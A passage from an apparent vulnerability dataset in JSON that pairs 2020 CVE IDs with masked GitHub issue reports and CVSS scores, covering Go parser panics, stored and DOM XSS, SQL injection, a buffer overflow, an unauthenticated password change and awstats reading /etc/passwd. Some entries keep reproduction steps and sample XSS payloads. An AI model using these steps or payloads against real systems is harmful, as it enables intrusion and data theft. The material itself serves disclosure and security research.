  59262. "description": "FILETAG [ ] APITAG Which versions of Valine, and which browser / OS are affected by this issue? Valine NUMBERTAG All systems and browsers",
  59263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59264. "severity": "MEDIUM",
  59265. "baseScore": 5.4,
  59266. "impactScore": 2.7,
  59267. "exploitabilityScore": 2.3
  59268. },
  59269. {
  59270. "CVE_ID": "CVE-2020-28851",
  59271. "Issue_Url_old": "https://github.com/golang/go/issues/42535",
  59272. "Issue_Url_new": "https://github.com/golang/go/issues/42535",
  59273. "Repo_new": "golang/go",
  59274. "Issue_Created_At": "2020-11-12T11:07:01Z",
  59275. "description": "text/language: panic in APITAG while parsing u extension. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
  59276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59277. "severity": "HIGH",
  59278. "baseScore": 7.5,
  59279. "impactScore": 3.6,
  59280. "exploitabilityScore": 3.9
  59281. },
  59282. {
  59283. "CVE_ID": "CVE-2020-28852",
  59284. "Issue_Url_old": "https://github.com/golang/go/issues/42536",
  59285. "Issue_Url_new": "https://github.com/golang/go/issues/42536",
  59286. "Repo_new": "golang/go",
  59287. "Issue_Created_At": "2020-11-12T11:12:42Z",
  59288. "description": "text/language: panic in APITAG while processing bcp NUMBERTAG tag. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
  59289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59290. "severity": "HIGH",
  59291. "baseScore": 7.5,
  59292. "impactScore": 3.6,
  59293. "exploitabilityScore": 3.9
  59294. },
  59295. {
  59296. "CVE_ID": "CVE-2020-28865",
  59297. "Issue_Url_old": "https://github.com/KFCFans/PowerJob/issues/99",
  59298. "Issue_Url_new": "https://github.com/powerjob/powerjob/issues/99",
  59299. "Repo_new": "powerjob/powerjob",
  59300. "Issue_Created_At": "2020-11-13T13:59:47Z",
  59301. "description": "Arbitrary password modification vulnerability. APITAG password modification vulnerability\uff09 \u5b98\u65b9\u8bd5\u7528\u5730\u5740\uff1a URLTAG NUMBERTAG test NUMBERTAG test NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG \u4fee\u6539\u7528\u6237\u5bc6\u7801\uff1a FILETAG FILETAG \u4e0d\u5b58\u5728\u8eab\u4efd\u6821\u9a8c\u7b49\u51ed\u8bc1\uff0c\u76f4\u63a5\u53ef\u4ee5\u4fee\u6539\u7528\u6237test2\u7684\u5bc6\u7801 APITAG FILETAG \u6700\u540e\u767b\u5f55\u6210\u529f\uff1a FILETAG FILETAG",
  59302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  59303. "severity": "HIGH",
  59304. "baseScore": 7.5,
  59305. "impactScore": 3.6,
  59306. "exploitabilityScore": 3.9
  59307. },
  59308. {
  59309. "CVE_ID": "CVE-2020-28924",
  59310. "Issue_Url_old": "https://github.com/rclone/rclone/issues/4783",
  59311. "Issue_Url_new": "https://github.com/rclone/rclone/issues/4783",
  59312. "Repo_new": "rclone/rclone",
  59313. "Issue_Created_At": "2020-11-18T12:13:24Z",
  59314. "description": "Place holder issue for security issue. ...details to follow",
  59315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59316. "severity": "HIGH",
  59317. "baseScore": 7.5,
  59318. "impactScore": 3.6,
  59319. "exploitabilityScore": 3.9
  59320. },
  59321. {
  59322. "CVE_ID": "CVE-2020-28948",
  59323. "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/33",
  59324. "Issue_Url_new": "https://github.com/pear/archive_tar/issues/33",
  59325. "Repo_new": "pear/archive_tar",
  59326. "Issue_Created_At": "2020-11-17T07:24:14Z",
  59327. "description": "Multiple vulnerabilities through filename manipulation. I have submitted this to the PEAR bug tracker as well as the PEAR group mailing list, and I'm not sure if either has gone through, so opening an issue here with the hope that this is the right place for it. While auditing a separate application which uses APITAG internally, I found that APITAG is vulnerable to object injection through Phar unserialization as well as to local file overwriting by crafting the 'filename' of a file in a tar archive. Phar unserialization There was a APITAG talk by Sam Thomas on exploiting PHP's Phar metadata unserialization behavior a couple of years ago, called \"It ERRORTAG APITAG ERRORTAG APITAG ERRORTAG PATHTAG ERRORTAG /etc/passwd or /etc/shadow ERRORTAG private function APITAG ERRORTAG PATHTAG APITAG scheme://`, it most likely is a malicious file. It would be great if you could fix and also request a CVE ID? Attachments: FILETAG",
  59328. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59329. "severity": "HIGH",
  59330. "baseScore": 7.8,
  59331. "impactScore": 5.9,
  59332. "exploitabilityScore": 1.8
  59333. },
  59334. {
  59335. "CVE_ID": "CVE-2020-28954",
  59336. "Issue_Url_old": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
  59337. "Issue_Url_new": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
  59338. "Repo_new": "bigbluebutton/bigbluebutton",
  59339. "Issue_Created_At": "2020-11-13T05:57:59Z",
  59340. "description": "Join API should filter control characters from user's name. The join API is not filtering for control characters in user name. This can be a problem for some XML parsers.",
  59341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  59342. "severity": "MEDIUM",
  59343. "baseScore": 5.3,
  59344. "impactScore": 1.4,
  59345. "exploitabilityScore": 3.9
  59346. },
  59347. {
  59348. "CVE_ID": "CVE-2020-28975",
  59349. "Issue_Url_old": "https://github.com/scikit-learn/scikit-learn/issues/18891",
  59350. "Issue_Url_new": "https://github.com/scikit-learn/scikit-learn/issues/18891",
  59351. "Repo_new": "scikit-learn/scikit-learn",
  59352. "Issue_Created_At": "2020-11-21T14:40:29Z",
  59353. "description": "Segmentation fault on SVMLIB. Description: In Scikit learn version NUMBERTAG calling the APITAG method maliciously crafted model SVM can result in a segmentation fault. Such models can be introduced via pickle, json, or any other model permanence standard. The behaviour is triggered when one of the members of the _n_support array has a very large value, example NUMBERTAG when calling APITAG Tested environment: Ubuntu NUMBERTAG ubuntu NUMBERTAG Python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG on linux Numpy version NUMBERTAG APITAG NUMBERTAG APITAG to Reproduce from sklearn import svm from sklearn import datasets if __name__ == '__main__': X,y = APITAG clf = APITAG APITAG y) APITAG NUMBERTAG y_pred = APITAG Expected Results not to fail Actual Results Segmentation fault, this is a debugger trace ERRORTAG Versions System: python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG executable: PATHTAG machine: Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Python dependencies: pip NUMBERTAG setuptools NUMBERTAG sklearn NUMBERTAG numpy NUMBERTAG scipy NUMBERTAG Cython: None pandas NUMBERTAG matplotlib NUMBERTAG joblib NUMBERTAG threadpoolctl NUMBERTAG Built with APITAG True",
  59354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59355. "severity": "HIGH",
  59356. "baseScore": 7.5,
  59357. "impactScore": 3.6,
  59358. "exploitabilityScore": 3.9
  59359. },
  59360. {
  59361. "CVE_ID": "CVE-2020-29069",
  59362. "Issue_Url_old": "https://github.com/pwnlandia/mhn/issues/799",
  59363. "Issue_Url_new": "https://github.com/pwnlandia/mhn/issues/799",
  59364. "Repo_new": "pwnlandia/mhn",
  59365. "Issue_Created_At": "2020-11-23T06:41:35Z",
  59366. "description": "Unknow IP can let mhn web crash. At one day, my MHN Web page can not open but all service is well . So I try to find the reason and this is the reason as following. If there is one IP address not in APITAG APITAG then the ISO country code will return APITAG When the code is APITAG then the MHN Web can not generate icon path and the system will be crashed. FILETAG Code: PATHTAG FILETAG At function \"_get_flag_ip_localdb\" in line NUMBERTAG if it work it can get IP ISO Code, but if IP has no record in APITAG APITAG it will return None. Next, line NUMBERTAG can not use \"upper function\" to the IP ISO code. If the page need to show the country icon APITAG Dashboard, Attack APITAG then the page will be crashed. There is the crash log in PATHTAG FILETAG My case \"IP NUMBERTAG FILETAG Now there will log the error in PATHTAG and page can show perfectly. FILETAG FILETAG So if use a special IP address to connect honeypot, then it can do the APITAG attack\" to MHN system.",
  59367. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  59368. "severity": "MEDIUM",
  59369. "baseScore": 5.5,
  59370. "impactScore": 3.6,
  59371. "exploitabilityScore": 1.8
  59372. },
  59373. {
  59374. "CVE_ID": "CVE-2020-29128",
  59375. "Issue_Url_old": "https://github.com/petl-developers/petl/issues/526",
  59376. "Issue_Url_new": "https://github.com/petl-developers/petl/issues/526",
  59377. "Repo_new": "petl-developers/petl",
  59378. "Issue_Created_At": "2020-10-02T03:56:32Z",
  59379. "description": "Security issue. Hello, I have a security issue to report. Can you please provide a contact to report it to or instructions on how to report it? Thanks!",
  59380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59381. "severity": "CRITICAL",
  59382. "baseScore": 9.8,
  59383. "impactScore": 5.9,
  59384. "exploitabilityScore": 3.9
  59385. },
  59386. {
  59387. "CVE_ID": "CVE-2020-29203",
  59388. "Issue_Url_old": "https://github.com/armink/struct2json/issues/13",
  59389. "Issue_Url_new": "https://github.com/armink/struct2json/issues/13",
  59390. "Repo_new": "armink/struct2json",
  59391. "Issue_Created_At": "2020-11-18T09:05:39Z",
  59392. "description": "An unsafe operation is found in the S2J_STRUCT_GET_string_ELEMENT function. struct2json Vulnerability Analysis An unsafe operation is found in the ERRORTAG . The strcpy function is used to copy APITAG to the struct , which may cause overflow when APITAG is longer than structure defined array size. img URLTAG POC CODETAG Run: img URLTAG Suggestion Use strncpy instead of strcpy to control the length of APITAG \uff1a CODETAG After modification\uff1a img URLTAG",
  59393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59394. "severity": "CRITICAL",
  59395. "baseScore": 9.8,
  59396. "impactScore": 5.9,
  59397. "exploitabilityScore": 3.9
  59398. },
  59399. {
  59400. "CVE_ID": "CVE-2020-29204",
  59401. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2083",
  59402. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2083",
  59403. "Repo_new": "xuxueli/xxl-job",
  59404. "Issue_Created_At": "2020-11-18T09:38:37Z",
  59405. "description": "NUMBERTAG Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit. Please answer some questions before submitting your issue. Thanks! Which version of XXL JOB do you using NUMBERTAG Expected behavior Add User\u3002 Actual behavior Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit Steps to reproduce the behavior url\uff1a FILETAG FILETAG poc\uff1a APITAG FILETAG The page automatically loads and triggers XSS FILETAG FILETAG Other information Restoration suggestions\uff1a",
  59406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59407. "severity": "MEDIUM",
  59408. "baseScore": 6.1,
  59409. "impactScore": 2.7,
  59410. "exploitabilityScore": 2.8
  59411. },
  59412. {
  59413. "CVE_ID": "CVE-2020-29242",
  59414. "Issue_Url_old": "https://github.com/dhowden/tag/issues/77",
  59415. "Issue_Url_new": "https://github.com/dhowden/tag/issues/77",
  59416. "Repo_new": "dhowden/tag",
  59417. "Issue_Created_At": "2020-11-19T13:15:59Z",
  59418. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. Hello, I found some vulnerability in this respository, they are could be used to cause a denial of service via decode some evil file. This is the first vulnerability in FILETAG . In APITAG function, you don't check the size of b parameter. If the size of b is zero or less than NUMBERTAG program will happen panic. testcase FILETAG info ERRORTAG",
  59419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59420. "severity": "MEDIUM",
  59421. "baseScore": 6.5,
  59422. "impactScore": 3.6,
  59423. "exploitabilityScore": 2.8
  59424. },
  59425. {
  59426. "CVE_ID": "CVE-2020-29243",
  59427. "Issue_Url_old": "https://github.com/dhowden/tag/issues/80",
  59428. "Issue_Url_new": "https://github.com/dhowden/tag/issues/80",
  59429. "Repo_new": "dhowden/tag",
  59430. "Issue_Created_At": "2020-11-19T13:44:09Z",
  59431. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the fourth vulnerability in FILETAG . In APITAG function, you don't check the size of b parameter. If the b parameter don't end with double zero, the size of APITAG is one after APITAG and then program will happen panic beause your check logic is a little late in line NUMBERTAG testcase FILETAG ERRORTAG",
  59432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59433. "severity": "MEDIUM",
  59434. "baseScore": 6.5,
  59435. "impactScore": 3.6,
  59436. "exploitabilityScore": 2.8
  59437. },
  59438. {
  59439. "CVE_ID": "CVE-2020-29244",
  59440. "Issue_Url_old": "https://github.com/dhowden/tag/issues/79",
  59441. "Issue_Url_new": "https://github.com/dhowden/tag/issues/79",
  59442. "Repo_new": "dhowden/tag",
  59443. "Issue_Created_At": "2020-11-19T13:29:16Z",
  59444. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the third vulnerability in FILETAG In APITAG function, you don't check the size of b , program will happen panic when the size of b is NUMBERTAG testcase FILETAG ERRORTAG",
  59445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59446. "severity": "MEDIUM",
  59447. "baseScore": 6.5,
  59448. "impactScore": 3.6,
  59449. "exploitabilityScore": 2.8
  59450. },
  59451. {
  59452. "CVE_ID": "CVE-2020-29245",
  59453. "Issue_Url_old": "https://github.com/dhowden/tag/issues/78",
  59454. "Issue_Url_new": "https://github.com/dhowden/tag/issues/78",
  59455. "Repo_new": "dhowden/tag",
  59456. "Issue_Created_At": "2020-11-19T13:24:16Z",
  59457. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the second vulnerability in FILETAG . In APITAG function, although you check the size of b , program also will happen panic when the size of b is NUMBERTAG testcase FILETAG ERRORTAG",
  59458. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59459. "severity": "MEDIUM",
  59460. "baseScore": 6.5,
  59461. "impactScore": 3.6,
  59462. "exploitabilityScore": 2.8
  59463. },
  59464. {
  59465. "CVE_ID": "CVE-2020-29249",
  59466. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
  59467. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
  59468. "Repo_new": "cbkhwx/cxuucmsv3",
  59469. "Issue_Created_At": "2020-11-20T09:42:01Z",
  59470. "description": "\u540e\u53f0 xss \u653b\u51fb. FILETAG FILETAG",
  59471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59472. "severity": "MEDIUM",
  59473. "baseScore": 6.1,
  59474. "impactScore": 2.7,
  59475. "exploitabilityScore": 2.8
  59476. },
  59477. {
  59478. "CVE_ID": "CVE-2020-29250",
  59479. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
  59480. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
  59481. "Repo_new": "cbkhwx/cxuucmsv3",
  59482. "Issue_Created_At": "2020-11-20T14:15:25Z",
  59483. "description": "xss vulnerability exists in FILETAG file. FILETAG",
  59484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59485. "severity": "MEDIUM",
  59486. "baseScore": 6.1,
  59487. "impactScore": 2.7,
  59488. "exploitabilityScore": 2.8
  59489. },
  59490. {
  59491. "CVE_ID": "CVE-2020-29280",
  59492. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/13",
  59493. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/13",
  59494. "Repo_new": "victoralagwu/cmssite",
  59495. "Issue_Created_At": "2020-07-05T09:47:18Z",
  59496. "description": "SQL Injection in FILETAG form. Hi, I've found a UNION SQL Injection into the search parameter of APITAG file. The vulnerable columns are the NUMBERTAG rd NUMBERTAG th NUMBERTAG th and NUMBERTAG th as you can see in the screen below. FILETAG",
  59497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59498. "severity": "CRITICAL",
  59499. "baseScore": 9.8,
  59500. "impactScore": 5.9,
  59501. "exploitabilityScore": 3.9
  59502. },
  59503. {
  59504. "CVE_ID": "CVE-2020-29315",
  59505. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/255",
  59506. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/255",
  59507. "Repo_new": "zoujingli/thinkadmin",
  59508. "Issue_Created_At": "2020-11-26T16:52:43Z",
  59509. "description": "There is a stored xss vulnerability in versions NUMBERTAG An issue was discovered in APITAG version NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point all version : URLTAG APITAG FILETAG NUMBERTAG choose \u7cfb\u7edf\u7ba1\u7406(system management) > APITAG Management) > APITAG users) FILETAG NUMBERTAG input Poc in the nickname and save FILETAG APITAG complete NUMBERTAG FILETAG NUMBERTAG FILETAG Maybe there are more stored XSS",
  59510. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59511. "severity": "MEDIUM",
  59512. "baseScore": 5.4,
  59513. "impactScore": 2.7,
  59514. "exploitabilityScore": 2.3
  59515. },
  59516. {
  59517. "CVE_ID": "CVE-2020-29394",
  59518. "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/274",
  59519. "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/274",
  59520. "Repo_new": "covesa/dlt-daemon",
  59521. "Issue_Created_At": "2020-11-28T03:15:46Z",
  59522. "description": "stack buffer overflow in dlt_filter_load. Summary An exploitable buffer overflow vulnerability exists in the dlt daemon, A specially crafted Filter file can cause a buffer overflow, resulting in multiple corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability. Details A buffer overflow in the dlt_filter_load function in dlt_common.c in dlt daemon allows arbitrary code execution via an unsafe usage of fscanf, because it does not limit the number of characters to be read in a format argument. Affected NUMBERTAG dlt receive NUMBERTAG dlt sortbytimestamp NUMBERTAG dlt convert APITAG ERRORTAG URLTAG",
  59523. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59524. "severity": "HIGH",
  59525. "baseScore": 7.8,
  59526. "impactScore": 5.9,
  59527. "exploitabilityScore": 1.8
  59528. },
  59529. {
  59530. "CVE_ID": "CVE-2020-29437",
  59531. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/695",
  59532. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/695",
  59533. "Repo_new": "orangehrm/orangehrm",
  59534. "Issue_Created_At": "2020-11-28T19:16:33Z",
  59535. "description": "security issue. Hi, I would like to report a security issue, can I please get a point of contact? Thanks!",
  59536. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
  59537. "severity": "HIGH",
  59538. "baseScore": 8.1,
  59539. "impactScore": 5.2,
  59540. "exploitabilityScore": 2.8
  59541. },
  59542. {
  59543. "CVE_ID": "CVE-2020-29456",
  59544. "Issue_Url_old": "https://github.com/ciur/papermerge/issues/228",
  59545. "Issue_Url_new": "https://github.com/ciur/papermerge/issues/228",
  59546. "Repo_new": "ciur/papermerge",
  59547. "Issue_Created_At": "2020-11-27T21:37:03Z",
  59548. "description": "Stored Cross Site Scripting (XSS). Description Improper validation of user input leads to stored cross site scripting (XSS) or HTML injection in the papermerge web application. If a user inserts APITAG or HTML code into a folder name, the specified payload will be executed on opening the folder. Expected Specifying potentially malicious client side code should not be executed in the web application by the browser. Actual The browser successfully executes the specified JS or HTML payloads if the newly created folder is opened. Steps to reproduce NUMBERTAG Login to papermerge web application URLTAG NUMBERTAG Create a new folder named \"XSS Folder APITAG alert('XSS'); APITAG \" without the quotes NUMBERTAG Open the newly created folder with XSS payload and experience a APITAG XSS popup saying \"XSS\". Impact This may allow an attacker to steal sensitive session information or CSRF tokens for executing a Cross Site Request Forgery attack. Likelihood Authentication is required to access the papermerge web application. Recommendation Do not trust any user input and validate inputs properly. See URLTAG Info: Tested in the publicly available demo page. URLTAG",
  59549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59550. "severity": "MEDIUM",
  59551. "baseScore": 6.1,
  59552. "impactScore": 2.7,
  59553. "exploitabilityScore": 2.8
  59554. },
  59555. {
  59556. "CVE_ID": "CVE-2020-29561",
  59557. "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/504",
  59558. "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/504",
  59559. "Repo_new": "riscv-boom/riscv-boom",
  59560. "Issue_Created_At": "2020-11-30T11:29:50Z",
  59561. "description": "Misaligned load reserve should not set reservation. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Other information APITAG APITAG Misaligned load reserve instruction should not set reservation. However boom set reservation even after misaligned load exception. APITAG makes the bug case binary ( APITAG ). Logs of both boom and rocket are also included. FILETAG",
  59562. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59563. "severity": "MEDIUM",
  59564. "baseScore": 5.5,
  59565. "impactScore": 3.6,
  59566. "exploitabilityScore": 1.8
  59567. },
  59568. {
  59569. "CVE_ID": "CVE-2020-29587",
  59570. "Issue_Url_old": "https://github.com/simplcommerce/SimplCommerce/issues/969",
  59571. "Issue_Url_new": "https://github.com/simplcommerce/simplcommerce/issues/969",
  59572. "Repo_new": "simplcommerce/simplcommerce",
  59573. "Issue_Created_At": "2021-01-13T12:36:40Z",
  59574. "description": "Admin dashboard vulnerable to DOM XSS. Opened this issue because there is not a security advisory or a response from the repo maintainers after sending a report by email. The POC described here used the docker continuous deployment instance ( URLTAG POC The following POC is just an example of many others that are prone to DOM XSS. To better understand and see a more detailed explanation of what is, please see the following link: URLTAG Using the user register page and the input is the Full Name field at the register page ( URLTAG > Payload APITAG alert NUMBERTAG APITAG FILETAG An user with the name _ APITAG alert NUMBERTAG APITAG _ is registered and stored to the database. This payload appears to not be triggered while browsing through the site but when admin needs to remove this user, the payload is executed. Below is shown an example where to trigger our malicious payload at URLTAG FILETAG We can see the registered user and the payload in the full name field. Nothing anormal happens when loading the page. But when trying to remove the user and after clicking the remove button the script of the malicious payload is executed and the alert box appears. This behavior confirms the XSS vulnerability. It requires to click the remove button, but as soon as is clicked, the exploit is executed. Looking to the inspector from the dev tools, we can see the injected script in the Bootbox modal body . FILETAG In the APITAG code, this happens in the following line of code at URLTAG FILETAG When clicked the delete button , the function vm.user(delete) is executed. If we look for the FILETAG file ( FILETAG we can see of the function is doing. FILETAG At line NUMBERTAG the value of APITAG field is added directly to the bootbox modal without proper sanitization making it vulnerable to XSS. Also, at line NUMBERTAG a toast is launched when we confirm deleting the user and again APITAG is added to the toast. The same payload can be triggered twice if we follow this use case. Fixing the vulnerability As the FILETAG maintainer does not fix the XSS vulnerability, to protect the users of APITAG from being attacked is recommended to sanitize input before adding it to any bootbox modal or dialog . The following link explains the approach to validate user data URLTAG The next functions are just suggestions to validate input data. Upon your goals, you can choose the one(s) that best fit to your project: APITAG FILETAG APITAG FILETAG",
  59575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59576. "severity": "MEDIUM",
  59577. "baseScore": 5.4,
  59578. "impactScore": 2.7,
  59579. "exploitabilityScore": 2.3
  59580. },
  59581. {
  59582. "CVE_ID": "CVE-2020-29600",
  59583. "Issue_Url_old": "https://github.com/eldy/awstats/issues/90",
  59584. "Issue_Url_new": "https://github.com/eldy/awstats/issues/90",
  59585. "Repo_new": "eldy/awstats",
  59586. "Issue_Created_At": "2018-02-20T12:30:46Z",
  59587. "description": "CVETAG question. See URLTAG To fix this issue I upgraded to the latest release NUMBERTAG dfsg NUMBERTAG ubuntu NUMBERTAG on my ubuntu NUMBERTAG Then I tried to open URLTAG it is still parsing /etc/passwd (even though only trying reading value pairs) and fails: > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. Surely it should not open absolut paths? The problem comes from this code, around line NUMBERTAG if ( APITAG ) { > my APITAG = APITAG APITAG > APITAG try to open an absolute path : APITAG NUMBERTAG if ( f APITAG && open(CONFIG, APITAG { > APITAG = APITAG > APITAG = ''; > if APITAG config: APITAG NUMBERTAG APITAG > } > else { > if APITAG to open config file: APITAG NUMBERTAG In my case, the server has a name, lets say APITAG it also has a DNS alias APITAG However there is no config for that domain in /etc/awstats, so it fails to find a config file it then reads a config file from the parameters and accepts a file that has an absolute path. Sure that should not be allowed? Workaround: comment out the above code. Question: what is the proper way to fix this?",
  59588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59589. "severity": "CRITICAL",
  59590. "baseScore": 9.8,
  59591. "impactScore": 5.9,
  59592. "exploitabilityScore": 3.9
  59593. },
  59594. {
  59595. "CVE_ID": "CVE-2020-29607",
  59596. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/96",
  59597. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/96",
  59598. "Repo_new": "pluck-cms/pluck",
  59599. "Issue_Created_At": "2020-12-01T18:26:57Z",
